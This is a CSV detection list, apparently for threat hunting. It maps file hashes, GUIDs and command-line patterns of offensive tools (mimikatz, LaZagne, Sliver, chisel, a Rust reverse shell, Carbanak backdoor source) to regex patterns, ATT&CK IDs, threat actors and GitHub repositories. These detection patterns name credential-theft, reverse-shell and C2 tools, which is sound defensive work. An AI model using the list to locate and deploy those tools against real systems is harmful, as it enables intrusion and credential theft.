"*0c94f85cb61c62e3f2124ea95d74c5fbd2901751d3536c23b36631ba800d628d*",".{0,1000}0c94f85cb61c62e3f2124ea95d74c5fbd2901751d3536c23b36631ba800d628d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21556"
"*0c96f88dbaccc1386890569356cf4ad5f45bbc49824ee7578dd56fa677460cbd*",".{0,1000}0c96f88dbaccc1386890569356cf4ad5f45bbc49824ee7578dd56fa677460cbd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21557"
"*0c9720ca9be018a435d41614f7cf66cf4aefda0c89c0fc829265315a2b0cc595*",".{0,1000}0c9720ca9be018a435d41614f7cf66cf4aefda0c89c0fc829265315a2b0cc595.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","21558"
"*0c9a9c3ce08d379b81646f92d8cb90fbd3fb384e497a4388f4bc33f1c4c41a44*",".{0,1000}0c9a9c3ce08d379b81646f92d8cb90fbd3fb384e497a4388f4bc33f1c4c41a44.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21559"
"*0c9c1d4a02cdc9cac7b19c0b055468d9c04714c00bd3df254490ecf4953c5c95*",".{0,1000}0c9c1d4a02cdc9cac7b19c0b055468d9c04714c00bd3df254490ecf4953c5c95.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","0","#filehash","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","21560"
"*0c9df22b5df37a9552ab164949a14dcd9d1dbcbd90b7a5870c1ed145ea10ae16*",".{0,1000}0c9df22b5df37a9552ab164949a14dcd9d1dbcbd90b7a5870c1ed145ea10ae16.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","21561"
"*0ca10134908aead6310e72aae31b7eca8e653ccfa9a2bad686cea277367e4f83*",".{0,1000}0ca10134908aead6310e72aae31b7eca8e653ccfa9a2bad686cea277367e4f83.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21563"
"*0ca53778e8cf399b1052ba2f500881d04066525b65e8b564360e7b581ac9cf68*",".{0,1000}0ca53778e8cf399b1052ba2f500881d04066525b65e8b564360e7b581ac9cf68.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21564"
"*0ca801fdfa8a5040b2e60608fe9ff7fc987ef7d361e389ddcc8d1568b8832230*",".{0,1000}0ca801fdfa8a5040b2e60608fe9ff7fc987ef7d361e389ddcc8d1568b8832230.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21565"
"*0cb2d09cb81a09c12093fa3cd9739efe998eff21f430375a9b51ee305d8623ac*",".{0,1000}0cb2d09cb81a09c12093fa3cd9739efe998eff21f430375a9b51ee305d8623ac.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","21566"
"*0cb5af2ee5239ef9d399446af3088fd26fff2e012b9f8b7e7e59569c8d7d6369*",".{0,1000}0cb5af2ee5239ef9d399446af3088fd26fff2e012b9f8b7e7e59569c8d7d6369.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21567"
"*0cb637ff999fdec518a1792b5d98d6ffbd9eb65ebb828950bf9fd488d351e190*",".{0,1000}0cb637ff999fdec518a1792b5d98d6ffbd9eb65ebb828950bf9fd488d351e190.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","21568"
"*0cb85b94cf22a5eb8c6a391c9546aeeb1d86b7e7ae482b512de0f45c3ed90f26*",".{0,1000}0cb85b94cf22a5eb8c6a391c9546aeeb1d86b7e7ae482b512de0f45c3ed90f26.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","21569"
"*0cc0c88006e85595ae428127d119a86d78c6c61631478d23fdd533a547222f05*",".{0,1000}0cc0c88006e85595ae428127d119a86d78c6c61631478d23fdd533a547222f05.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21573"
"*0CC923FB-E1FD-456B-9FE4-9EBA5A3DC2FC*",".{0,1000}0CC923FB\-E1FD\-456B\-9FE4\-9EBA5A3DC2FC.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#GUIDproject","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","21574"
"*0CD16C7B-2A65-44E5-AB74-843BD23241D3*",".{0,1000}0CD16C7B\-2A65\-44E5\-AB74\-843BD23241D3.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/outflanknl/PrintNightmare","1","0","#GUIDproject","N/A","10","4","337","67","2021-09-13T08:45:26Z","2021-09-13T08:44:02Z","21577"
"*0cd6b6f2c8164d440a118eb546a05d54232cedd792b4e5998cd653a5f3921a40*",".{0,1000}0cd6b6f2c8164d440a118eb546a05d54232cedd792b4e5998cd653a5f3921a40.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21579"
"*0cd8f2bd40fdca1eb41c8317b86b1382f1cbf57e2a7537fd731c8541132bef60*",".{0,1000}0cd8f2bd40fdca1eb41c8317b86b1382f1cbf57e2a7537fd731c8541132bef60.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","#filehash","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","21581"
"*0cf16d4d70941be216c787a44a7401c9c9547016952a2c699579d4e4bb9c8110*",".{0,1000}0cf16d4d70941be216c787a44a7401c9c9547016952a2c699579d4e4bb9c8110.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","#filehash","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","21585"
"*0cf7ec1618e87248f23674db07692a63fbd4e945102b143baa5b34d7eebb5977*",".{0,1000}0cf7ec1618e87248f23674db07692a63fbd4e945102b143baa5b34d7eebb5977.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21587"
"*0cf8787b1bfb746c629b92dc5a471a436105e176d306a2808a636adab4df1508*",".{0,1000}0cf8787b1bfb746c629b92dc5a471a436105e176d306a2808a636adab4df1508.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","21588"
"*0cf9297dc4511e2957e45524ec12f8b6e9c4873cec625daf20d27aedc0bdf5e9*",".{0,1000}0cf9297dc4511e2957e45524ec12f8b6e9c4873cec625daf20d27aedc0bdf5e9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21589"
"*0cf9297dc4511e2957e45524ec12f8b6e9c4873cec625daf20d27aedc0bdf5e9*",".{0,1000}0cf9297dc4511e2957e45524ec12f8b6e9c4873cec625daf20d27aedc0bdf5e9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21590"
"*0cfb136f47821f46d232eb0bd3b37b652d9846c4d66646292a9418c86d1faf47*",".{0,1000}0cfb136f47821f46d232eb0bd3b37b652d9846c4d66646292a9418c86d1faf47.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","21592"
"*0cffe83538d449fae070161c557a89aad53f47d7472eb22c2cfc3c2671852fa6*",".{0,1000}0cffe83538d449fae070161c557a89aad53f47d7472eb22c2cfc3c2671852fa6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21595"
"*0d0b7a5276ebfefb28407800d2ba37f5102c9917cacaac5b265df55f95759b14*",".{0,1000}0d0b7a5276ebfefb28407800d2ba37f5102c9917cacaac5b265df55f95759b14.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","21601"
"*0d1448c1bc3c43a7a989e251079fcd0bea32cb8864b4b00cb8c17310464fd06d*",".{0,1000}0d1448c1bc3c43a7a989e251079fcd0bea32cb8864b4b00cb8c17310464fd06d.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","21602"
"*0D17A4B4-A7C4-49C0-99E3-B856F9F3B271*",".{0,1000}0D17A4B4\-A7C4\-49C0\-99E3\-B856F9F3B271.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","#GUIDproject","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","21603"
"*0d1a410e8085517a23da9fee226564169f767570993dcbb8f0b81b579a50e541*",".{0,1000}0d1a410e8085517a23da9fee226564169f767570993dcbb8f0b81b579a50e541.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21604"
"*0d1n * --post * --payloads *",".{0,1000}0d1n\s.{0,1000}\s\-\-post\s.{0,1000}\s\-\-payloads\s.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","0","N/A","N/A","7","","N/A","","","","21605"
"*0d1n --host*",".{0,1000}0d1n\s\-\-host.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","0","N/A","N/A","7","","N/A","","","","21606"
"*0d1n*kill_listener.sh*",".{0,1000}0d1n.{0,1000}kill_listener\.sh.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","21607"
"*0d21ae4c38549782f8b066155b671b2a356721209a5ecaa64bba6edcc6e2f97e*",".{0,1000}0d21ae4c38549782f8b066155b671b2a356721209a5ecaa64bba6edcc6e2f97e.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on  https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","0","#filehash","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","21608"
"*0d2536112fc0b0960f00bf8d8b8a824dd0bcaf9b46336398edc11f2fdab63ecf*",".{0,1000}0d2536112fc0b0960f00bf8d8b8a824dd0bcaf9b46336398edc11f2fdab63ecf.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21609"
"*0d2f5c4ee9f63b465776329c0ad2c94cbad788db383a0d94c0219a64d7f55d46*",".{0,1000}0d2f5c4ee9f63b465776329c0ad2c94cbad788db383a0d94c0219a64d7f55d46.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","21612"
"*0d31a6d35d6b320f815c6ba327ccb8946d4d7f771e0dcdbf5aa8af775576f2d1*",".{0,1000}0d31a6d35d6b320f815c6ba327ccb8946d4d7f771e0dcdbf5aa8af775576f2d1.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21613"
"*0d31a6d35d6b320f815c6ba327ccb8946d4d7f771e0dcdbf5aa8af775576f2d1*",".{0,1000}0d31a6d35d6b320f815c6ba327ccb8946d4d7f771e0dcdbf5aa8af775576f2d1.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21614"
"*0d31ab15ca76d4169ac74d4f09b7d79b762758edad0c5f23032e3a53327045ec*",".{0,1000}0d31ab15ca76d4169ac74d4f09b7d79b762758edad0c5f23032e3a53327045ec.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","21615"
"*0d33356f9addc458bf9fc3861d9cafef954a51b66412b1cfc435eede351733f1*",".{0,1000}0d33356f9addc458bf9fc3861d9cafef954a51b66412b1cfc435eede351733f1.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#filehash #linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","21616"
"*0d3f1696aae8472145400d6858b1c44ba7532362be5850dae2edbd4a40f36aa5*",".{0,1000}0d3f1696aae8472145400d6858b1c44ba7532362be5850dae2edbd4a40f36aa5.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","21618"
